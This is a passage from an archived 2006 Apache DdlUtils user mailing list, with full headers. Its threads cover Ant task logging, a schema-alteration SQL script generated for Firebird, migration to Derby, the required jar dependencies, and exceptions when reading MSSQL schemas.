-Ddb.props=database/ddlutils/oracle.properties db.clean > > [ddl_to_db] log4j:WARN No appenders could be found for logger > org.apache.commons.digester.Digester). > [ddl_to_db] log4j:WARN Please initialize the log4j system properly. > > This is important as it would give us clues as to why the Ant tasks fail > for situtations like all the Oracle tablespace is used up etc... Well, Ant is difficult when it comes to logging because a task is usually loaded from a classloader that is different to Ant's own classloader. Thus, it is required to put the logging configuration file (e.g. log4j.properties) into the classpath that is used to load/run the task. When defining the task you should have a classpathref attribute or a classpath subelement that specifies the ddlutils jar among others. In this classpath you need to include the logging properties file, e.g. by adding an additional path entry to this classpath. Tom From [email protected] Fri Jun 16 12:00:36 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 66449 invoked from network); 16 Jun 2006 12:00:35 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 16 Jun 2006 12:00:35 -0000 Received: (qmail 24615 invoked by uid 500); 16 Jun 2006 12:00:35 -0000 Delivered-To: [email protected] Received: (qmail 24590 invoked by uid 500); 16 Jun 2006 12:00:35 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <ddlutils-user.db.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 24579 invoked by uid 99); 16 Jun 2006 12:00:35 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 16 Jun 2006 05:00:35 -0700 X-ASF-Spam-Status: No, hits=0.6 required=10.0 tests=SPF_PASS,UPPERCASE_50_75 X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO smtp3.matrix.com.br) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 16 Jun 2006 05:00:33 -0700 Received: from portalbl1.matrix.net.br (unknown [161.129.204.104]) by smtp3.matrix.com.br (Postfix) with SMTP id BF5DC17F44E for <[email protected]>; Fri, 16 Jun 2006 07:15:27 -0300 (BRT) Received: (qmail 10762 invoked from network); 16 Jun 2006 12:00:10 -0000 Received: from unknown (HELO is1) ([email protected]@[161.129.204.104]) (envelope-sender <[email protected]>) by portalbl1.matrix.net.br (qmail-ldap-1.03) with SMTP for <[email protected]>; 16 Jun 2006 12:00:10 -0000 Message-ID: <009e01c6913c$6bd53d00$0207a8c0@is1> From: "Douglas Granzotto (Infoarte)" <[email protected]> To: <[email protected]> References: <003601c68fb2$cbc60220$0207a8c0@is1> <[email protected]> <003e01c68fc1$66026190$0207a8c0@is1> <[email protected]> <007401c68fdd$3d6e21d0$0207a8c0@is1> <[email protected]> Subject: Re: Plataform.getAlterTablesSql results Date: Fri, 16 Jun 2006 09:00:10 -0300 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2800.1106 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106 X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N ----- Original Message ----- From: "Thomas Dudziak" <[email protected]> To: <[email protected]> Sent: Wednesday, June 14, 2006 7:23 PM Subject: Re: Plataform.getAlterTablesSql results > On 6/14/06, Douglas Granzotto (Infoarte) <[email protected]> wrote: > > > Yes, I got the sources on 06/08/2006. > > The FirebirdBuider.java class is ok. > > The script generated by plataform.getAlterTablesSql(Database desiredDb, > > boolean doDrops, boolean modifyColumns, boolean continueOnError) works > > well. > > The only problem are these lines, that I think are unnecessary. > > DdlUtils will rebuild the table if the changes cannot be done via > specific SQL commands. In your case, I guess that DdlUtils detected > not only the column addition but also another change that cannot be > handled via a specific SQL statement. > Since the generated SQL does not contain the original table > definition, its hard to say what the change was that lead to the full > table rebuild. Could you perhaps post the SQL for creating the > original table ? > > Tom > Original Table: CREATE TABLE "IPI" ( "IPICOD" VARCHAR(2) NOT NULL, "IPIDESC" VARCHAR(30), "TIPO" INTEGER, "VERSAO" INTEGER, PRIMARY KEY ("IPICOD")); CREATE INDEX "IX_IPI_1" ON "IPI"("IPIDESC"); New Table: CREATE TABLE "IPI" ( "IPICOD" VARCHAR(2) NOT NULL, "IPIDESC" VARCHAR(30), "TIPO" INTEGER, "CLASSFISCAL" VARCHAR(12), "VERSAO" INTEGER, CONSTRAINT "PK_IPI" PRIMARY KEY ("IPICOD")); CREATE INDEX "IX_IPI_1" ON "IPI"("IPIDESC"); SQL script generated by getAlterTablesSql: ALTER TABLE IPI ADD CLASSFISCAL VARCHAR(12); ALTER TABLE IPI ALTER CLASSFISCAL POSITION 4; CREATE TABLE IPI_ ( IPICOD VARCHAR(2) NOT NULL, IPIDESC VARCHAR(30), TIPO INTEGER, CLASSFISCAL VARCHAR(12), VERSAO INTEGER, PRIMARY KEY (IPICOD) ); INSERT INTO IPI_ (CLASSFISCAL,IPICOD,IPIDESC,TIPO,VERSAO) SELECT CLASSFISCAL,IPICOD,IPIDESC,TIPO,VERSAO FROM IPI; DROP TABLE IPI; CREATE TABLE IPI ( IPICOD VARCHAR(2) NOT NULL, IPIDESC VARCHAR(30), TIPO INTEGER, CLASSFISCAL VARCHAR(12), VERSAO INTEGER, PRIMARY KEY (IPICOD) ); CREATE INDEX IX_IPI_1 ON IPI (IPIDESC); INSERT INTO IPI (IPICOD,IPIDESC,TIPO,CLASSFISCAL,VERSAO) SELECT IPICOD,IPIDESC,TIPO,CLASSFISCAL,VERSAO FROM IPI_; DROP TABLE IPI_; From [email protected] Tue Jun 20 06:02:03 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 98036 invoked from network); 20 Jun 2006 06:02:03 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 20 Jun 2006 06:02:03 -0000 Received: (qmail 30103 invoked by uid 500); 20 Jun 2006 06:02:03 -0000 Delivered-To: [email protected] Received: (qmail 30017 invoked by uid 500); 20 Jun 2006 06:02:02 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <ddlutils-user.db.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 30006 invoked by uid 99); 20 Jun 2006 06:02:02 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 19 Jun 2006 23:02:02 -0700 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO nz-out-0102.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 19 Jun 2006 23:02:01 -0700 Received: by nz-out-0102.google.com with SMTP id m7so746033nzf for <[email protected]>; Mon, 19 Jun 2006 23:01:41 -0700 (PDT) DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; h=received:message-id:date:from:to:subject:mime-version:content-type:content-transfer-encoding:content-disposition; b=RPmQsniwYkrUuvng1tgK08a8i95v7Ob3kJaZzUUEIl64WkXIMon8mzjZ3GPbIn2SUatL6yDbHY1X1af3rELBTvJDwCB3x7WFUxxLk+a1rb2iTYdB67Ti2PYG5FH9FAVyXjZlyludLVpk/A4oc5ocVz6/DWPjpCKbR8XEegp7vEc= Received: by 161.129.204.104 with SMTP id t12mr5194998nzg; Mon, 19 Jun 2006 23:01:40 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Mon, 19 Jun 2006 23:01:40 -0700 (PDT) Message-ID: <[email protected]> Date: Mon, 19 Jun 2006 23:01:40 -0700 From: "Ramin Moazeni" <[email protected]> To: [email protected], [email protected] Subject: Database Migration MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit Content-Disposition: inline X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Hi, I am planning to use the ddlutils for migration from variety of databeases to apache derby. I know that ddlutils provides a way to get schema from variety of databases. I was wondering if it provides a way to automatically change schema between databases for migration? Please advise.... Thanks, Ramin Moazeni From [email protected] Tue Jun 20 15:28:14 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 50435 invoked from network); 20 Jun 2006 15:28:14 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 20 Jun 2006 15:28:14 -0000 Received: (qmail 44038 invoked by uid 500); 20 Jun 2006 15:28:14 -0000 Delivered-To: [email protected] Received: (qmail 44009 invoked by uid 500); 20 Jun 2006 15:28:14 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <ddlutils-user.db.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 43996 invoked by uid 99); 20 Jun 2006 15:28:14 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 20 Jun 2006 08:28:14 -0700 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO ms-smtp-02.socal.rr.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 20 Jun 2006 08:28:13 -0700 Received: from [161.129.204.104] (cpe-204-210-23-212.san.res.rr.com [161.129.204.104]) by ms-smtp-02.socal.rr.com (8.13.6/8.13.6) with ESMTP id k5KFRpcU028643 for <[email protected]>; Tue, 20 Jun 2006 08:27:52 -0700 (PDT) Message-ID: <[email protected]> Date: Tue, 20 Jun 2006 08:27:51 -0700 From: "Jean T. Anderson" <[email protected]> Reply-To: [email protected] User-Agent: Mozilla Thunderbird 1.0.7-1.1.fc3 (X11/20050929) X-Accept-Language: en-us, en MIME-Version: 1.0 To: [email protected] Subject: Re: Database Migration References: <[email protected]> In-Reply-To: <[email protected]> X-Enigmail-Version: 161.129.204.104 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit X-Virus-Scanned: Symantec AntiVirus Scan Engine X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Ramin Moazeni wrote: > Hi, > > I am planning to use the ddlutils for migration from variety of > databeases to apache derby. I know that ddlutils provides a way to get > schema from variety of databases. I was wondering if it provides a way > to automatically change schema between databases for migration? Derby has an example that shows a way to migrate a database to derby using DdlUtils: http://db.apache.org/derby/integrate/db_ddlutils.html This specific example uses derby as the source and target databases, but it should work between any of the databases DdlUtils supports. Step 4 in the example exports the schema (and data) from the source database, and Step 5 creates the schema in the target database (and imports the data). The schema file created by Step 4 is in Turbine XML format and isn't specific to any database. -jean From [email protected] Thu Jun 22 14:41:54 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 32201 invoked from network); 22 Jun 2006 14:41:54 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 22 Jun 2006 14:41:54 -0000 Received: (qmail 39286 invoked by uid 500); 22 Jun 2006 14:41:54 -0000 Delivered-To: [email protected] Received: (qmail 39260 invoked by uid 500); 22 Jun 2006 14:41:54 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <ddlutils-user.db.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 39242 invoked by uid 99); 22 Jun 2006 14:41:53 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 22 Jun 2006 07:41:53 -0700 X-ASF-Spam-Status: No, hits=1.4 required=10.0 tests=DNS_FROM_RFC_ABUSE,DNS_FROM_RFC_WHOIS X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO web38609.mail.mud.yahoo.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Thu, 22 Jun 2006 07:41:53 -0700 Received: (qmail 89983 invoked by uid 60001); 22 Jun 2006 14:41:32 -0000 DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=s1024; d=yahoo.com; h=Message-ID:Received:Date:From:Subject:To:MIME-Version:Content-Type:Content-Transfer-Encoding; b=PTLmxRglvP9Nsey68f4FNnNGLmuH5XoMmqABcUqWvw/+YkTbz6DE0UC/IvNumpJgfXjQCKSuFlpES6HdYJiUbf1ljM4wnH9310JjMtUcZNzIcbWRyyphgmXRUv48dVLqb7hxBIzIf1y0Gc8MB3bu6m5UX7Vk94SvDONpSi7ExF0= ; Message-ID: <[email protected]> Received: from [161.129.204.104] by web38609.mail.mud.yahoo.com via HTTP; Thu, 22 Jun 2006 07:41:32 PDT Date: Thu, 22 Jun 2006 07:41:32 -0700 (PDT) From: Demetrios Kyriakis <[email protected]> Subject: Minimum dependencies? To: [email protected] MIME-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Hi, What are the minimum library dependencies that are required by DDLUtils to work? (of course without the dB drivers, since this depend on the used database(es)). In the often mentioned article: http://db.apache.org/derby/integrate/db_ddlutils.html all the *.jar files from the /lib/ are supposed to be used, but e.g. the hsqldb-1.7.1.jar file is not needed. Maybe there are other jars too that are not required (only in the development process of DDLUtils)? I would like to know what are the minimum required jars for the following usage scenarios: 1. Just using the API, so no ANT tasks. 2. Using the ANT tasks, but having ANT installed and properly configured on the system where those tasks are supposed to be used. Thank you, D. __________________________________________________ Do You Yahoo!? Tired of spam? Yahoo! Mail has the best spam protection around http://mail.yahoo.com From [email protected] Fri Jun 23 15:07:52 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 40970 invoked from network); 23 Jun 2006 15:07:52 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 23 Jun 2006 15:07:52 -0000 Received: (qmail 11598 invoked by uid 500); 23 Jun 2006 15:07:51 -0000 Delivered-To: [email protected] Received: (qmail 11564 invoked by uid 500); 23 Jun 2006 15:07:51 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <ddlutils-user.db.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 11531 invoked by uid 99); 23 Jun 2006 15:07:50 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 23 Jun 2006 08:07:50 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: neutral (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO mx.crye-leike.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 23 Jun 2006 07:35:00 -0700 Received: from mail.crye-leike.com (local.mail [161.129.204.104]) by mx.crye-leike.com (8.13.6/8.13.6) with ESMTP id k5NEYifh026784 for <[email protected]>; Fri, 23 Jun 2006 09:34:44 -0500 Received: from [161.129.204.104] (qh_7145 [161.129.204.104] (may be forged)) by mail.crye-leike.com (8.13.6/8.13.6) with ESMTP id k5NEYcQ0004083 for <[email protected]>; Fri, 23 Jun 2006 09:34:38 -0500 Date: Fri, 23 Jun 2006 09:34:38 -0500 From: Shaun <[email protected]> To: [email protected] Subject: Exceptions when using DdlUtils and Platform.readModelFromDatabase() Message-Id: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset="US-ASCII" Content-Transfer-Encoding: 7bit X-Mailer: Becky! ver. 2.24.02 [en] X-SA-Status: 2 X-Scanned-By: MIMEDefang 2.56 on 161.129.204.104 X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Hi all, I've just found DdlUtils and I'm quite impressed by this package. I'm running into a bit of trouble trying to export schema from MSSQL databases, though. Here's a class I'm using to test out DdlUtils (I'm omitting the imports for the sake of brevity) public class DdlUtilTest { public static void main(String[] args) throws SQLException { JtdsDataSource ds = new JtdsDataSource(); ds.setUser("sa"); ds.setPassword("xxxxx"); ds.setServerName("x.x.x.x"); ds.setDatabaseName("MyDbName"); Connection conn = ds.getConnection(); DatabaseMetaData meta = conn.getMetaData(); Platform p = PlatformFactory.createNewPlatformInstance(ds); String filename = "src\\schema\\MyDbName-schema.xml"; new DatabaseIO().write(p.readModelFromDatabase("MyDbName"), filename); } } This works perfectly for some databases, but throws seemingly random exceptions for others. For example, running it against "MyDbName" properly generates src\schema\MyDbName-schema.xml, which contains the correct schema. However, trying to run it against "MySecondDb" throws this exception: Exception in thread "main" org.apache.ddlutils.DynaSqlException: java.sql.SQLException: Invalid column name 'Zip'. at org.apache.ddlutils.platform.PlatformImplBase.readModelFromDatabase(PlatformImplBase.java:1706) at org.apache.ddlutils.platform.PlatformImplBase.readModelFromDatabase(PlatformImplBase.java:1684) at com.mycompany.test.ddlutiltest.DdlUtilTest.main(DdlUtilTest.java:69) Trying to run it against "YetAnotherDb" throws this exception: Exception in thread "main" org.apache.ddlutils.DynaSqlException: java.sql.SQLException: Incorrect syntax near the keyword 'Primary'. at org.apache.ddlutils.platform.PlatformImplBase.readModelFromDatabase(PlatformImplBase.java:1706) at org.apache.ddlutils.platform.PlatformImplBase.readModelFromDatabase(PlatformImplBase.java:1684) at com.mycompany.test.ddlutiltest.DdlUtilTest.main(DdlUtilTest.java:69) In both of these cases the exception is being thrown from this line: new DatabaseIO().write(p.readModelFromDatabase("MyDbName"), filename); I've tried several of the different signatures for readModelFromDatabase() and I wind up with the same exceptions no matter what I pass to it. Has anyone experienced similar issues? Am I using one of the DdlUtils methods incorrectly, or are the exceptions being thrown due to some problem with the database server? Thanks, Shaun From [email protected] Fri Jun 23 15:25:20 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 47344 invoked from network); 23 Jun 2006 15:25:19 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 23 Jun 2006 15:25:19 -0000 Received: (qmail 52880 invoked by uid 500); 23 Jun 2006 15:25:19 -0000 Delivered-To: [email protected] Received: (qmail 52860 invoked by uid 500); 23 Jun 2006 15:25:19 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <ddlutils-user.db.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 52834 invoked by uid 99); 23 Jun 2006 15:25:18 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 23 Jun 2006 08:25:18 -0700 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO ug-out-1314.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 23 Jun 2006 08:25:18 -0700 Received: by ug-out-1314.google.com with SMTP id m3so1130487uge for <[email protected]>; Fri, 23 Jun 2006 08:24:56 -0700 (PDT) DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references; b=RVi0thlEHralNu2yD7C6WbW8bPDxpM0cEh0J7eorSbiJuJMqycAf1eGN11fRRrPYINNbKtbeAn1JtJur9DMeASUDiM+lYJPdVjHqVVujmtDkdsecP0dP1IyrnPtLwntQR0ftNLv8A6NWpgnHD5pXa1XSc4wi+bIzmG2vv6pRYiQ= Received: by 161.129.204.104 with SMTP id d10mr1213024ugm; Fri, 23 Jun 2006 08:24:56 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Fri, 23 Jun 2006 08:24:56 -0700 (PDT) Message-ID: <[email protected]> Date: Fri, 23 Jun 2006 17:24:56 +0200 From: "Thomas Dudziak" <[email protected]> To: [email protected] Subject: Re: Minimum dependencies? In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit Content-Disposition: inline References: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N On 6/22/06, Demetrios Kyriakis <[email protected]> wrote: > What are the minimum library dependencies that are > required by DDLUtils to work? > (of course without the dB drivers, since this depend > on the used database(es)). > > In the often mentioned article: > http://db.apache.org/derby/integrate/db_ddlutils.html > all the *.jar files from the /lib/ are supposed to be > used, but > e.g. the hsqldb-1.7.1.jar file is not needed. > Maybe there are other jars too that are not required > (only in the development process of DDLUtils)? > > I would like to know what are the minimum required > jars for the following usage scenarios: > 1. Just using the API, so no ANT tasks. > > 2. Using the ANT tasks, but having ANT installed and > properly configured on the system where those tasks > are supposed to be used. Yep, you're right, Hsqldb is not really required at all, I'll remove it ASAP. Here's the list of relevant libraries and what they are used for: Main libraries: -------------------- Core libraries: commons-lang-2.1.jar commons-collections-3.1.jar commons-beanutils-1.7.0.jar commons-digester-1.7.jar commons-betwixt-0.8-dev.jar commons-logging-1.0.4.jar When reading/writing binary data from/to XML: commons-codec-1.3.jar For some platforms (e.g. Oracle): jakarta-oro-2.0.8.jar For writing data read from a live database to XML: stax-api-1.0.jar stax-1.1.2-dev.jar Libraries additionally necessary for the Ant tasks: ----------------------------------------------------------------------- For accessing the database: commons-dbcp-1.2.1.jar commons-pool-1.2.jar For the DumpMetadataTask: dom4j-1.4.jar All other libraries in the root and the libraries in the build-only sub folder are only required to build DdlUtils, but not to run it. Tom From [email protected] Fri Jun 23 15:39:14 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 51424 invoked from network); 23 Jun 2006 15:39:14 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 23 Jun 2006 15:39:14 -0000 Received: (qmail 96963 invoked by uid 500); 23 Jun 2006 15:34:33 -0000 Delivered-To: [email protected] Received: (qmail 96921 invoked by uid 500); 23 Jun 2006 15:34:33 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <ddlutils-user.db.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 96885 invoked by uid 99); 23 Jun 2006 15:34:33 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 23 Jun 2006 08:34:33 -0700 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO ug-out-1314.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 23 Jun 2006 08:34:32 -0700 Received: by ug-out-1314.google.com with SMTP id m3so1135297uge for <[email protected]>; Fri, 23 Jun 2006 08:34:11 -0700 (PDT) DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references; b=WMEOjyN7Kue33iS1nwCforVeEE+UhOoAqwCnEwHvZ5/A73JCwlFREhKeofs8rTwvJrtHGzrwRfRtT7aMSq7hUFDV25C8y7Vxeq2r2GfmhJoQhk5MlXGZYLIIMtvBABIsF9KU02MdKjlyCcoK/gFBlyeJpercfDI69dfciTTuisc= Received: by 161.129.204.104 with SMTP id g12mr2349210ugj; Fri, 23 Jun 2006 08:34:10 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Fri, 23 Jun 2006 08:34:10 -0700 (PDT) Message-ID: <[email protected]> Date: Fri, 23 Jun 2006 17:34:10 +0200 From: "Thomas Dudziak" <[email protected]> To: [email protected] Subject: Re: Exceptions when using DdlUtils and Platform.readModelFromDatabase() In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit Content-Disposition: inline References: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N On 6/23/06, Shaun <[email protected]> wrote: > I've just found DdlUtils and I'm quite impressed by this package. I'm > running into a bit of trouble trying to export schema from MSSQL > databases, though. <snip> > Exception in thread "main" org.apache.ddlutils.DynaSqlException: java.sql.SQLException: Invalid column name 'Zip'. > at org.apache.ddlutils.platform.PlatformImplBase.readModelFromDatabase(PlatformImplBase.java:1706) > at org.apache.ddlutils.platform.PlatformImplBase.readModelFromDatabase(PlatformImplBase.java:1684) > at com.mycompany.test.ddlutiltest.DdlUtilTest.main(DdlUtilTest.java:69) > > Trying to run it against "YetAnotherDb" throws this exception: > > Exception in thread "main" org.apache.ddlutils.DynaSqlException: java.sql.SQLException: Incorrect syntax near the keyword 'Primary'. > at org.apache.ddlutils.platform.PlatformImplBase.readModelFromDatabase(PlatformImplBase.java:1706) > at org.apache.ddlutils.platform.PlatformImplBase.readModelFromDatabase(PlatformImplBase.java:1684) > at com.mycompany.test.ddlutiltest.DdlUtilTest.main(DdlUtilTest.java:69) > > In both of these cases the exception is being thrown from this line: > > new DatabaseIO().write(p.readModelFromDatabase("MyDbName"), > filename); > > I've tried several of the different signatures for > readModelFromDatabase() and I wind up with the same exceptions no matter > what I pass to it. Has anyone experienced similar issues? Am I using one > of the DdlUtils methods incorrectly, or are the exceptions being thrown > due to some problem with the database server? These are SQL Exceptions and thus come from the database or the driver. Unfortunately you left out the interesting part of the stacktrace - there should be more to either one as the line where the exception is thrown, PlatformImplBase.java:1706, is where the original SQL exception is wrapped into a DdlUtils exception. There more interesting place would be where this original SQL exception happens. Please also note that DdlUtils is untested with jTDS, so there may be some issues with the JDBC metadata capabilities of jTDS that result in problems with DdlUtils. Could you run your tests with the Microsoft Sql Server 2005 driver to see whether the error occurs there as well ? Tom From [email protected] Fri Jun 23 16:25:13 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 70094 invoked from network); 23 Jun 2006 16:25:13 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 23 Jun 2006 16:25:13 -0000 Received: (qmail 15607 invoked by uid 500); 23 Jun 2006 16:25:13 -0000 Delivered-To: [email protected] Received: (qmail 15584 invoked by uid 500); 23 Jun 2006 16:25:13 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <ddlutils-user.db.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 15573 invoked by uid 99); 23 Jun 2006 16:25:12 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 23 Jun 2006 09:25:12 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: neutral (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO mx.crye-leike.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 23 Jun 2006 09:25:11 -0700 Received: from mail.crye-leike.com (local.mail [161.129.204.104]) by mx.crye-leike.com (8.13.6/8.13.6) with ESMTP id k5NGOvkU013774 for <[email protected]>; Fri, 23 Jun 2006 11:24:57 -0500 Received: from [161.129.204.104] (qh_7145 [161.129.204.104] (may be forged)) by mail.crye-leike.com (8.13.6/8.13.6) with ESMTP id k5NGOnEL010931 for <[email protected]>; Fri, 23 Jun 2006 11:24:50 -0500 Date: Fri, 23 Jun 2006 11:24:50 -0500 From: Shaun <[email protected]> To: [email protected] Subject: Re: Exceptions when using DdlUtils and Platform.readModelFromDatabase() In-Reply-To: <[email protected]> References: <[email protected]> <[email protected]> Message-Id: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset="US-ASCII" Content-Transfer-Encoding: 7bit X-Mailer: Becky! ver. 2.24.02 [en] X-SA-Status: 2 X-Scanned-By: MIMEDefang 2.56 on 161.129.204.104 X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N On Fri, 23 Jun 2006 17:34:10 +0200 "Thomas Dudziak" <[email protected]> wrote: > These are SQL Exceptions and thus come from the database or the > driver. Unfortunately you left out the interesting part of the > stacktrace - there should be more to either one as the line where the > exception is thrown, PlatformImplBase.java:1706, is where the original > SQL 